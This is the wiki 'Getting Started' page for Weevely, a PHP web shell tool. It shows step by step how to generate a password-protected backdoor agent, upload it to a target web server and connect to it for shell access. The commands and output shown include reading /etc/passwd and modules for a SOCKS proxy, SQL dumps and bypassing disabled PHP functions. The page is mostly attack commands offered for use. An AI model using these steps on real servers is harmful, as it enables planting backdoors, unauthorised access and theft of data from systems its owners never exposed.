Skip to content

Getting Started

Jump to bottom
Emilio edited this page Dec 26, 2019 · 2 revisions

Print usage

Weevely client communicates to the PHP agent installed into the target. Move to the weevely3/ folder and run ./weevely.py to print the help screen.

$ ./weevely.py
 
[+] weevely 4.0.0
[!] Error: too few arguments

[+] Run terminal to the target
    weevely <URL> <password>

[+] Load session file
    weevely session <path>

[+] Generate backdoor agent
    weevely generate <password> <path>

Generate the backdoor agent

To generate a new agent, just use the generate option passing the password and path arguments.

$ ./weevely.py generate mypassword agent.php
Generated backdoor with password 'mypassword' in 'agent.php' of 671 byte size.

Upload the agent

Upload the generated agent under the target web folder. Make sure that the agent URL is reachable from your position, and it correcly executed by the web server as PHP code.

Connect to the agent

Launch weevely script to connect to the remote agent.

$ ./weevely.py http://target/agent.php mypassword
weevely>

The first prompt weevely> isn't connected yet to allow the user to set the options or print help.

weevely> :set proxy <type>://<host>:<port>
weevely> :help

Type a first command to establish the shell access to the target.

weevely> uname -a
Linux ubuntu 3.2.0-65-generic 99-Ubuntu SMP Fri Jul 4 21:04:27 UTC 2014 i686 i686 i386 GNU/Linux
www-data@target:/var/ $ cat /etc/passwd
root:*:0:0:System Administrator:/var/root:/bin/sh

Type : and double tab command to list the modules.

www-data@target:/var/ $ :<TAB>
audit_disablefunctionbypass  cp                           file_gzip                    gunzip                       net_scan                     sql_dump
audit_etcpasswd              curl                         file_ls                      gzip                         net_socksproxy               system_extensions
...

Prepend a : to run a module.

www-data@target:/var/ $ :audit_suidsgid --help
usage: audit_suidsgid [-h] [-only-suid] [-only-sgid] rpath

Find files with SUID or SGID flags.

positional arguments:
  rpath       Remote starting path

optional arguments:
...

If the target PHP settings don't allow to execute external commands, Weevely uses PHP> prompt and emulates commands such as cd, cat, curl, nano in order to provide a functional shell access to the server.

Clone this wiki locally